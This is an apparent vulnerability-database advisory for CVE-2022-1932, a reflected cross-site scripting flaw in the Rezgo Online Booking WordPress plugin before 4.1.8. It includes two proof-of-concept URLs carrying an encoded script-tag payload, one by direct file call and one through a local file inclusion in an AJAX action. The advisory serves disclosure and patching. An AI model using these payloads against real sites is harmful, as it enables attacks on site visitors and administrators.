WordPress Plugin Vulnerabilities

Rezgo Online Booking < 4.1.8 - Reflected Cross-Site-Scripting

Description

The plugin does not sanitise and escape some parameters before outputting them back in a page, leading to a Reflected Cross-Site Scripting, which can be exploited either via a LFI in an AJAX action, or direct call to the affected file

Proof of Concept

Direct call: https://example.com/wp-content/plugins/rezgo/rezgo/templates/default/frame_header.php?tags=%22%3E%3Cscript%3Ealert(`xss`)%3C/script%3E

Via the LFI:

Once the plugin is configured (can use a dummy "Rezgo Company Code" and "Rezgo API Key" in the "Acccount Information" settings section):

http://example.com/wp-admin/admin-ajax.php?action=rezgo&method=rezgo/templates/default/frame_header&tags=%22%3E%3Cscript%3Ealert(`xss`)%3C/script%3E

Affects Plugins

Plugin icon
rezgo
Fixed in 4.1.8

References

CVE
CVE-2022-1932

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
6.1 (medium)

Miscellaneous

Original Researcher
cydave
Submitter
cydave
Submitter website
https://cyllective.com/
Submitter twitter
cyllective
Verified
Yes
WPVDB ID
005c2300-f6bd-416e-97a6-d42284bbb093

Timeline

Publicly Published
2022-07-26 (about 1 years ago)
Added
2022-07-26 (about 1 years ago)
Last Updated
2022-08-25 (about 1 years ago)

Other

Published
Title
Published
2023-05-09
Title
Easy Hide Login < 1.0.8 - Admin+ Stored XSS
Published
2024-03-29
Title
Ultimate Social Comments – Email Notification & Lazy Load <= 1.4.8 - Authenticated (Contributor+) Stored Cross-Site Scripting
Published
2023-09-04
Title
WordPress File Sharing < 2.0.4 - Admin+ Stored XSS
Published
2022-05-16
Title
FiboSearch < 1.18.0 - Admin+ Stored Cross-Site Scripting
Published
2023-06-19
Title
Super Socializer < 1.13.53 - Contributor+ Stored XSS